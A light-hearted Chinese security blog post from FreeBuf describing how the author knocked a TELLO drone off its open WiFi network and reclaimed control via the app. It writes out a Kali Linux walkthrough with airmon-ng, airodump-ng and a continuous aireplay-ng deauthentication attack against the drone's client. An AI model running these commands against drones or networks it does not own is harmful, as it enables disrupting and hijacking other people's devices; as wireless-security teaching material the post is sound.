freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

夺回无人机!
2021-11-18 20:15:48

识链实验室@李饼饼
李某人今天新买了个无人机~

美滋滋想飞一飞再拆解研究固件时.....

面对砂锅大的拳头,李某人觉得还是以同事间的感情为重!

哼~搁那儿研究呢

李某人决定用知识夺回心爱的无人机!
首先IOT设备通常脆弱点为:Web端漏洞、APP端漏洞、固件漏洞、无线电通信漏洞、硬件漏洞
无人机这类设备通常可以以无线电通信为切入点(固件被抢走了还没来得及研究)
既然讲到无人机无线电通信,第一时间想到的当然是WiFi,而且既然是新设备处于未配置状态,大概率连接是空口令或者弱口令,如果设备没有绑MAC地址,用常规的WiFi渗透思路通过发包让对方设备掉线,然后重新用客户端连接并接管设备理论上是可行的,接着来试试~
1.启动kali,iwconfig查看无线网卡配置

2.airmon-ng start wlan0将wlan0开启监听模式

3.airodump-ng wlan0mon扫描网络,TELLO-EE8A75,就是你了
BSSID:WiFi MAC地址
PWR:信号强度
BEACONS:信标
DATA:数据
CH:信道
ENS:加密方式,图中OPN为开放
ESSID:WiFi名称

4.新建个终端airodump-ng wlan0mon --bssid <BSSID> --channel 9
STATION为无人机MAC地址

5.再新建个终端aireplay-ng --deauth 0 -c <STATION> -a <BSSID> wlan0mon看看效果去~
--deauth为冲突攻击模式,0为循环攻击

6.屏都黑了,还搁那儿研究呢

7.登录APP客户端,成功夺回

市面上无人机安全问题各个层面层出不穷,这里仅提供简单思路,供各位举一反三,之后拆解设备分析固件安全问题。

# 渗透测试 # 无线安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者